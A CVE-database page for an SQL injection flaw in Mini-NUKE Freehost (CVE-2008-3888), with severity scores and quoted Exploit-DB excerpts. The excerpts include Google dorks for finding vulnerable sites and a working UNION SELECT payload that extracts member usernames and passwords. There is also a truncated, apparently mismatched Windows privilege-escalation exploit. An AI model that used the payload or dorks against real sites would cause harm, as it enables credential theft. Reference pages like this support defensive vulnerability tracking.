CVE-2008-3888
published 2008-09-02CVE-2008-3888: SQL injection vulnerability in members.asp in Mini-NUKE Freehost 2.3 allows remote attackers to execute arbitrary SQL commands via the uid parameter in a…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.89%
54.9th percentile
SQL injection vulnerability in members.asp in Mini-NUKE Freehost 2.3 allows remote attackers to execute arbitrary SQL commands via the uid parameter in a member_details action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| aspindir | mini_nuke_freehost | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Windows - Task Scheduler Privilege Escalation
exploitdb·2010-11-20
CVE-2010-3888 Microsoft Windows - Task Scheduler Privilege Escalation
Microsoft Windows - Task Scheduler Privilege Escalation
---
# Exploit Title: Windows Task Scheduler Privilege Escalation 0day
# Date: 20-11-2010
# Author: webDEViL
# Tested on: Windows 7/2008 x86/x64
crc_table = new Array(
0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419,
0x706AF48F, 0xE963A535, 0x9E6495A3, 0x0EDB8832, 0x79DCB8A4,
0xE0D5E91E, 0x97D2D988, 0x09B64C2B, 0x7EB17CBD, 0xE7B82D07,
0x90BF1D91, 0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE,
0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7, 0x136C9856,
0x646BA8C0, 0xFD62F97A, 0x8A65C9EC, 0x14015C4F, 0x63066CD9,
0xFA0F3D63, 0x8D080DF5, 0x3B6E20C8, 0x4C69105E, 0xD56041E4,
0xA2677172, 0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B,
0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940, 0x32D86CE3,
0x45DF5C75, 0xDCD60DCF, 0xABD13D5
Exploit-DB
MiniNuke 2.1 - 'uid' SQL Injection
exploitdb·2008-02-25
CVE-2008-3888 MiniNuke 2.1 - 'uid' SQL Injection
MiniNuke 2.1 - 'uid' SQL Injection
---
###############################################################
#
# MiniNuke v2.1 forum SQL Injection
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAİL : [email protected]
#
################################################################
#
# DORK 1 : allinurl:"members.asp?action"
#
# DORK 2 : allinurl: "members.asp"uid
#
################################################################
EXAMPLE=
members.asp?action=member_details&uid=SQL (exploit)
EXPLOIT 1 :
members.asp?action=member_details&uid=-1%20union%20select%200,sifre,0,0,0,0,0,kul_adi,0,sifre,kul_adi,sifre,1,1,1,sifre,1,1,1,isim,1,1,1,1,1,1,1,1%20from%20members
EXPLOIT 2 :
members.a
No writeups or analysis indexed.
2008-09-02
Published